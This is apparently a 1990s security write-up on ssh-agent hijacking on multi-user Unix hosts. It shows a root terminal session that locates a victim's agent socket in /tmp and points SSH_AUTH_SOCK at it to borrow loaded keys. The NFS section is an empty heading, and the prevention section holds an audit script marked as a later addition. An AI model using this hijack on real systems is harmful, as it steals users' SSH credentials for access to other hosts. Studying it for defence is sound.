ssh-agent hi-jacking. 10/3/96

With ssh being adopted more every day as the secure way of opening a remote shell on a unix host, we are opening up new vulnerabilities. A common solution to remote authentication is ssh keys, where a user starts an agent and loads their key for later use. These agents, left unattended on multi-user systems, can be gateways to other hosts. This is exacerbated on multi-user systems that make use of shared user space, such as NFS-exported home directories. This document will attempt to outline exposures and methods of attack. I will also suggest solutions.

What is ssh?

From the man page: "ssh (SSH client) is a program for logging into a remote machine and for executing commands on a remote machine. It is intended to replace rlogin and rsh, and provide secure encrypted communications between two untrusted hosts over an insecure network."

ssh's more popular use.

With companies becoming more security conscious in the digital age, and a move towards eliminating clear text transmissions, ssh has become more prevalent as a secure remote administration solution. Gone are the days of telnet (except for OTP), rsh and rlogin; ssh has become the standard replacement for these protocols.

ssh key authentication.

One of the many features of ssh is its ability to authenticate using digital keys. This ability adds another layer of security over the normal password based authentication scheme. Now a user must have a public key installed on the remote server and possess the private key as well. That private key is usually encrypted and requires a passphrase for use. Even if the private key is captured, the attacker must possess the passphrase to unlock the key.

ssh-agent usage.

ssh-agent is a daemon that stores the private keys used for public key authentication. The intent is that ssh-agent is started at the beginning of a session and all subsequent clients can be authenticated via the agent.

Dangers of ssh-agent.

Most ssh-agent users tend to leave the agent running for hours or days while the system is inactive. This is dangerous because if the system is compromised or the account is taken over, these agents can be roadways into other systems.

Example of agent hi-jacking.

1) Standard attack scenario: the box is compromised and the attacker looks for active agents, using known_hosts to gather possible targets. This is a simple matter of looking at the process list, getting a list of running agent pids, and looking in /tmp for authentication sockets.

    [r00t@pangea lwc]# ps -ef |grep agent
    lwc 9099 1 0 18:00 ? 00:00:00 ssh-agent -s
    [r00t@pangea lwc]# ls -ld /tmp/ssh*
    drwx------ 2 lwc lwc 4096 Jun 16 18:00 /tmp/ssh-XXP0tLAD
    [r00t@pangea lwc]# ls -l /tmp/ssh*
    total 0
    srwxrwxr-x 1 lwc lwc 0 Jun 16 18:00 agent.9098

Set the ssh-agent environment variables.

    [root@pangea lwc]# su - lwc
    [lwc@pangea lwc]$ export SSH_AUTH_SOCK=/tmp/ssh-XXP0tLAD/agent.9098
    [lwc@pangea lwc]$ export SSH_AGENT_PID=9099
    [lwc@pangea lwc]$ ssh-add -l
    1024 14:84:03:8d:03:50:f9:81:c4:5e:53:84:84:c3:f2:5a lwc@pangea.internal (RSA1)

2) /home is shared via nfs.

Prevention.
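The danger described above is agents left running for hours or days. The following audit helper is an added example, not part of the original document: it flags ssh-agent processes whose elapsed run time exceeds a threshold, so an administrator can find stale agents before an intruder does. It assumes a Linux procps-ng `ps` that supports the `etimes` (elapsed seconds) column; the sample process list is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added audit helper (not from the original document). Reads lines in the
# format of `ps -eo user,pid,etimes,comm` from stdin and prints every
# ssh-agent whose elapsed run time (column 3, seconds) exceeds the limit.
find_stale_agents() {
    limit="$1"   # threshold in seconds
    awk -v limit="$limit" '
        $4 == "ssh-agent" && $3 + 0 > limit {
            printf "%s pid %s running %.1f hours\n", $1, $2, $3 / 3600
        }
    '
}

# Live use on a host (assumes procps-ng ps with the etimes column).
audit_live_agents() {
    ps -eo user,pid,etimes,comm | find_stale_agents "${1:-3600}"
}

# Constructed sample standing in for live ps output: one agent up for
# 26 hours, one started two minutes ago, and an unrelated long-lived shell.
SAMPLE_PS='USER PID ETIMES COMMAND
lwc 9099 93600 ssh-agent
alice 4242 120 ssh-agent
bob 5555 200000 bash'

# Number of stale agents in the constructed sample for a given threshold.
stale_agent_count() {
    printf '%s\n' "$SAMPLE_PS" | find_stale_agents "$1" | wc -l | tr -d ' '
}
```

Run `audit_live_agents 3600` from cron to report agents older than an hour; the sample functions exist only to show the expected output shape.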